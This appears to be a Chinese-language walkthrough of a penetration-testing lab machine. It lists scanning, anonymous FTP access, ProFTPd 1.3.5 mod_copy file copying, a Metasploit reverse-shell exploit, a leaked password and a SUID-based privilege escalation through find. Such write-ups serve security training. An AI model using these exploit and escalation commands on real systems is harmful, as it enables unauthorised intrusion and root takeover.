一、信息收集
1、查看靶机的MAC地址:
2、扫描靶机的ip地址:
nmap 192.168.13.0/24
3、扫描靶机开放的端口:
nmap -p- -sC -sT -sV -A 192.168.13.155
4、访问靶机的80端口:
5、扫描目录:
dirsearch -u "http://192.168.13.155"
dirsearch -u "http://192.168.13.155/ossec/"
6、依次访问目录,只发现了两串数字,发现没有什么有用的信息:
7、在扫描端口时发现可以进行ftp匿名登录:
用户:Anonymous
8、经过查看发现,download目录是空的,upload目录里有二十来个文本文件:
9、查看之后发现只有一个名叫directory的文本文件可能有点用,可以看出来patrick目录下有很多文本文件:
经过查看筛选,只有version_control这个文件有点用
10、使用命令将version_control文件拷贝到upload目录中,然后下载查看:
telnet 192.168.13.155 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
get version_control
发现了敏感信息:
ProFTPd: 1.3.5
/var/www/tryingharderisjoy
11、使用msf搜索漏洞:
msfconsole
search proftpd 1.3.5
12、利用漏洞反弹shell:
use 0
show options
set rhosts 192.168.13.155
set sitepath /var/www/tryingharderisjoy
set payload cmd/unix/reverse_python
Run
13、反弹成功,查看用户权限不高,获取一个交互式会话
python -c 'import pty;pty.spawn("/bin/bash")'
二、提权
1、查看用户是否有sudo权限,发现需要用户输入密码:
2、通过查看本地文件,发现patricksecretsofjoy文件中出现账号和密码:
用户patrick的密码:apollo098765
3、使用账号密码切换用户:
4、经过查看发现用户具有sudo权限:
5、执行test文件发现,这个文件可以以root身份赋予权限:
sudo /home/patrick/script/test
6、给find命令赋予suid权限,进行提权:
../../../../../../../../../../usr/bin/find
4777
7、执行find命令进行提权:
find . -exec /bin/sh \; -quit